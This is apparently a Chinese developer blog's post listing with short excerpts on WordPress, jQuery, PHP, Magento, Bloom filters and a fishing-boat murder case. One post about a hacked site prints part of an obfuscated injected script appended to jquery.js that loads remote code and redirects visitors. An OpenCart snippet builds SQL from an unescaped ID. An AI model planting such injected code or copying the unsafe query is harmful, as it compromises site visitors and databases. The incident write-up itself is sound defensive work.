;

蜜罐好比是情报收集系统。 蜜罐好像是故意让人攻击的目标,引诱黑客前来攻击。所以攻击者入侵后,你就可以知道他是如何得逞的,随时了解针对服务器发动的最新的攻击和漏洞。还可以通过窃听黑客之间的联系,收集黑客所用的种种工具,并且掌握他们的社交网络。

蜜罐技术 2017年4月11日
;

创建流程: 1.创建一个函数,当 WordPress 发现短代码的时候会调用此函数; function recent_posts_function() { query_posts(array(‘orderby’ => ‘date’, ‘order’ => ‘DESC’ , ‘showposts’ => 1)); if (have_posts()) : while (have_posts()) : the_post(); $return_string = ‘<a href="’.get_permalink().’">’.get_the_title().'</a>’; endwhile; endif; wp_reset_query(); return $return_string; } 2.通过设置一个唯一的名称来注册短代码; function register_shortcodes(){ add_shortcode(‘recent-posts’, ‘recent_posts_function’); } 3.把注册的函数绑定到Wordpress的action上。 add_action( ‘init’, ‘register_shortcodes’);

wordpress 短代码详解 2017年3月31日
;

slice() 把匹配元素集合缩减为指定的指数范围的子集。 <ul> <li>list item 1</li> <li>list item 2</li> <li>list item 3</li> <li>list item 4</li> <li>list item 5</li> </ul> $(‘li’).slice(2).css(‘background-color’, ‘red’);选中的是后面三个li元素。

jquery slice用法 2017年3月29日
;

echo $cat; $args = array( ‘orderby’ => name, //获取指定ID下的所有子级目录 ‘show_count’=> 1, ‘child_of’=>$cat ); wp_list_categories($args);

wordpress 获取同级目录 2017年3月24日
;

1:admin-ajax.php 前端页面: <script type="text/javascript"> jQuery.ajax({ type: ‘POST’, url: "<?php echo admin_url( ‘admin-ajax.php’ );?>", data: { action: ‘myajax_submit’ }, success: function(res) { console.log(JSON.stringify("–"+res)); } }); </script> 后端functions.php里面接受请求: add_action( ‘wp_ajax_nopriv_myajax_submit’, ‘myajax_submit’ ); add_action( ‘wp_ajax_myajax_submit’, ‘myajax_submit’ ); function myajax_submit() { $response = json_encode( array( ‘success’ => true ) ); header( "Content-Type: application/json" ); e…

wordpress函数 2017年3月21日
;

php文件可通过url直接被访问,暴露各种路径信息。 通过配置’.htpaccess’始终无法如愿。 苦恼之时,后来突然意识到是因为PHP开启了错误提示导致。 文件位置: /etc/php5/apache2/php.ini 修改 display_errors = On 为 display_errors = Off

关闭直接通过url访问php文件 2017年3月20日
;

https://codex.wordpress.org/Hardening_WordPress 15 Ways To Harden The Security Of Your WordPress Site

wordpress 安全 2017年3月17日
;

问题描述: 1,通过微信朋友圈链接点击进入网站,导航按钮点击失效。 2,跳转到其它页面再点击导航按钮功能却正常。 3,浏览器及微信web开发者工具内问题无法重现,一切功能正常。 4,css各种修改,位置调整及元素标签修改,问题依旧。 5,类似结构其它网站无此bug。 权宜之计: 通过把相关的js写到头部页面内,问题消失。 相关: 其它项目中也遇到在微信打开后一些奇怪的边框,通过调整z-index解决

微信朋友圈链接,导航按钮点击失效 2017年3月17日
;

Bloom filter 是由 Howard Bloom 在 1970 年提出的二进制向量数据结构,它具有很好的空间和时间效率,被用来检测一个元素是不是集合中的一个成员。 Bloom filter 是由 Howard Bloom 在 1970 年提出的二进制向量数据结构,它具有很好的空间和时间效率,被用来检测一个元素是不是集合中的一个成员。如果检测结果为是,该元素不一定在集合中;但如果检测结果为否,该元素一定不在集合中。因此Bloom filter具有100%的召回率。这样每个检测请求返回有“在集合内(可能错误)”和“不在集合内(绝对不在集合内)”两种情况,可见 Bloom filter 是牺牲了正确率和时间以节省空间。 如需要判断一个元素是不是在一个集合中,我们通常做法是把所有元素保存下来,然后通过比较知道它是不是在集合内,链表、树都是基于这种思路,当集合内元素个数的变大,我们需要的空间和时间都线性变大,检索速度也越来越慢。 Bloom filter 采用的是哈希函数的方法,将一个元素映射到一个 m 长度的阵列上的一个点,当这个点是 1 时,那么这个元素在集合内,反之则不在集合内。这个方法的缺点就是当检测的元素很多的时候可能有冲突,解决方法就是使用 k 个哈希 函数对应 k 个点,如果所有点都是 1 的话,那么元素在集合内,如果有 0 的话…

bloom filter 2017年3月17日
;

技术中心 开发文档 模版制作 http://www.magentoucd.com 博客:http://blog.csdn.net/shuishui8310/article/category/640421 查看当前模式: magento deploy:mode:show 改变模式: magento deploy:mode:set {mode} [-s|–skip-compilation] {mode} is required; it can be either developer or production –skip-compilation is an optional parameter you can use to skip code compilation when you change to production mode. 设置为开发模式后报错处理:删除”var/.maintenance.flag” During theme development, when you change any files stored here, you need to clear pub/static and var/view_preprocessed directories, and then reload t…

magento 资源链接 2017年3月15日
;

位置:后台-设置-固定链接-可选-分类目录前缀 修改:填入即可

去掉分类列表url里的category 2017年3月8日
;

html <a class="label label-success" onclick="fastform({$row[‘id’]},$(this))">提交</a> 函数内 function fastform(id,$this) { //对象已经传递进来 } How to use $(this) in functions?

function内传递$(this) 2017年3月6日
;

以逆向商业化方式做出来的产品既难营销也难卖,主要就是缺乏预期利益,在做产品的过程中很容易发现卖点不足,产品团队就会本能地产生堆叠思维,把一系列的功能放进去换取心理安全感,最终导致产品的成本增加,体验变差,卖点复杂,售价昂贵但用户无法感知到价值,形成滞销局面。

预期利益 2017年3月5日
;

中文分词(Chinese Word Segmentation) 指的是将一个汉字序列切分成一个一个单独的词。分词就是将连续的字序列按照一定的规范重新组合成词序列的过程。我们知道,在英文的行文中,单词之间是以空格作为自然分界符的,而中文只是字、句和段能通过明显的分界符来简单划界,唯独词没有一个形式上的分界符,虽然英文也同样存在短语的划分问题,不过在词这一层上,中文比之英文要复杂的多、困难的多。 外文名 Chinese Word Segmentation 背景 存在中文分词技术,是由于中文在基本文法上有其特殊性,具体表现在: 1.与英文为代表的拉丁语系语言相比,英文以空格作为天然的分隔符,而中文由于继承自古代汉语的传统,词语之间没有分隔。 古代汉语中除了连绵词和人名地名等,词通常就是单个汉字,所以当时没有分词书写的必要。而现代汉语中双字或多字词居多,一个字不再等同于一个词。 2.在中文里,“词”和“词组”边界模糊 现代汉语的基本表达单元虽然为“词”,且以双字或者多字词居多,但由于人们认识水平的不同,对词和短语的边界很难去区分。 例如:“对随地吐痰者给予处罚”,“随地吐痰者”本身是一个词还是一个短语,不同的人会有不同的标准,同样的“海上”“酒厂”等等,即使是同一个人也可能做出不同判断,如果汉语真的要分词书写,必然会出现混乱,难度很大。 中文分词的方…

中文分词 2017年3月4日
;

这是一场现实版的《大逃杀》,不同的是,它发生在我们成人世界。在遥远的东南太平洋上,一群本该相依为命、同出同归的中国船员,却反目成仇,拔刀相向。16人被杀害,6人失踪,这样的结局令人不寒而栗。 从第一个厨师死亡开始,孤悬的渔轮成了人性的炼狱,每个人都被恐怖笼罩,因愤怒而杀人,因柔弱而丧命,朋友相互猜疑,同伙转眼内讧。一个猜忌,一个眼神,都可能引来一场杀戮。是什么将人性的恶夸张释放?是极端的环境?还是人性使然? 惨案告诉世人,在远离世俗的约束,人类往往选择另行一套弱肉强食的价值观念。但如果当事人都有高度的道德自律和法制意识,悲剧或许不会发生。而惨案暴露出来的人员遴选、劳务保障、救援机制、心理辅导等等漏洞,亦需反思与改正。 “鲁荣渔2682”号事情发生经过 2010年12月,“鲁荣渔2682”搭载33名船员远赴东南太平洋“淘金”。然而,再次回港时,大部分家属却没有等到亲人们归来——船上22名船员已经丧命。 凶手是另外11名船员。在远隔重洋的秘鲁海域和随后的回国途中,部分船员在刘贵夺的带领下,欲图控制船长,劫持船只。行动期间杀了人,其后在人人自危的不信任氛围里,又发生了杀人和内讧事件,最终酿成一起生还者人人手上都沾了血的惨案。其中杀人最多的船员刘贵夺背负人命多达20条。 受害人丁玉民的妹妹丁玉梅回忆,2011年8月12日上午,山东荣成市石岛港暴雨如注…

中国远洋渔船22人被杀案:内蒙帮挑动东北帮杀人后被干掉 2017年3月2日
;

2010年12月,“鲁荣渔2682”号渔船载33名船员出海,2011年8月12日,被中国渔政船拖带回港时,船上只剩11名船员,历时近两年的侦办和审理,11人被判杀害22名同伴。 背景介绍 渔船 自2000年就开始出外海作业的“鲁荣渔2682号”隶属于山东荣成市鑫发水产公司,属大洋鱿钓船,船长三四十米,主机功率为330千瓦,作业水域主要是西南太平洋、东南太平洋,此次远洋的目的地就是东南太平洋的秘鲁、智利。 船员 远航的33名船员中,除了轮机长温斗外,管理人员还包括船长李承权、大副付义忠、二副王永波、大管王延龙等,其他为普通船员。船员来源较为纷杂,根据失踪者家属的还原及检方起诉书上的信息,可确认主要来自辽宁沈阳、朝阳、丹东、抚顺、大连,吉林长春,内蒙古,山东等地。 船员们多数也是亲戚、熟人之间互相邀约,比如温斗与船员温密是叔伯兄弟,二副王永波是船员吴国志妻子的表兄。来自大连的25岁船员王鹏也是受同时学驾驶汽车的“师兄”温斗邀约,抱着到外面闯一闯的念头,不顾父母的阻止第一次登上远洋渔船。 出海 2010年12月27日,按照往常的习惯,在船头点燃一挂鞭炮后,“鲁荣渔2682号”出海驶向秘鲁,开始第五次外海作业。根据公司与船员们签订的工作合同,他们的归期在两年之后。 前半年的作业似乎还较为顺利。2010年的大年三十,王鹏母亲接到儿子用海事卫星打来的电话…

鲁荣渔2682号惨案 2017年2月28日
;

菜单弹出时addClass(‘understatic’). body.understatic { overflow: hidden; } 菜单消失时候removeClass(‘understatic’).

解决–弹出层滚动带动下层整个内容页滚动 2017年2月27日
;

方法一: $("div.test").css("cssText", "width:650px !important;"); 方法二: $(‘#elem’).attr(‘style’, ‘width: 100px !important’); 方法三: 新建类,通过addClass覆盖

jquery,css,包含important 2017年2月27日
;

无效代码: $(‘h1’).click(function(){ $(‘a’).trigger(‘click’); }); 方法一:需要定位到a标签内的元素 $(‘h1’).click(function(){ $(‘a span’).trigger(‘click’); }); 方法二:jquery转化为js对象 $(‘h2’).click(function(){ $(‘a’)[0].click(); });

trigger触发a跳转 2017年2月27日
;

function format (num) { return (num.toFixed(2) + ”).replace(/\d{1,3}(?=(\d{3})+(\.\d*)?$)/g, ‘$&,’); } var num = 12345; alert(format(num));

js整数转货币 2017年2月27日
;

方式一,setTimeout: $(document).ready(function() { function showpanel() { $(".navigation").hide(); $(".page").children(".panel").fadeIn(1000); } setTimeout(showpanel, 1000) }); 方式二,queue: function showImage(){ $("img").fadeIn(500); } $(document).ready(function(){ $(".show-image").click(function(){ $(this).text(‘loading…’).delay(1000).queue(function() { $(this).hide(); showImage(); //calling showimage() function $(this).dequeue(); }); }); });

Run Function After Delay 2017年2月27日
;

公司网站莫名被黑,初次打开跳转到别的网站,再打开不跳转,猜测cookie被写入,删除之调试,相关JS文件改回来,网站一旦访问再次被感染,影响上百个JS文件及部分PHP文件。 解决办法:全局清除感染代码。调整文件权限。 (整个病毒工作原理Malicious Pastebin Replacement for jQuery) jquery.js 文件后被追加如下代码,跳转地址为一个广告分发中心 var _0xaae8 = ["", "\x6A\x6F\x69\x6E", "\x72\x65\x76\x65\x72\x73\x65", "\x73\x70\x6C\x69\x74", "\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C", "\x77\x72\…

wodpress js文件注入相关代码 2017年2月7日

一:配置path 二:cmd执行: php  d:/phpstudy/www/test.php

windows下的CLI模式下运行php文件 2017年1月6日

文件一:/data/wwwroot/auto/catalog/view/theme/pav_bigmart/template/common/product/default.tpl 追加: <span class="wl20161228_reviews" style="display: block;"> <?php if(!empty($product[‘review_count’])) echo @"(".$product[‘review_count’]."reviews)"; ?> </span> 文件二:/data/wwwroot/auto/catalog/model/catalog/product.php 追加: public function get_review_count($product_id) { $sql = "SELECT COUNT(DISTINCT `review_id`) AS total FROM `" . DB_PREFIX . "review` WHERE `product_id`=" . $product_id; $query = $this->db…

opencart 首页 添加 review 2017年1月5日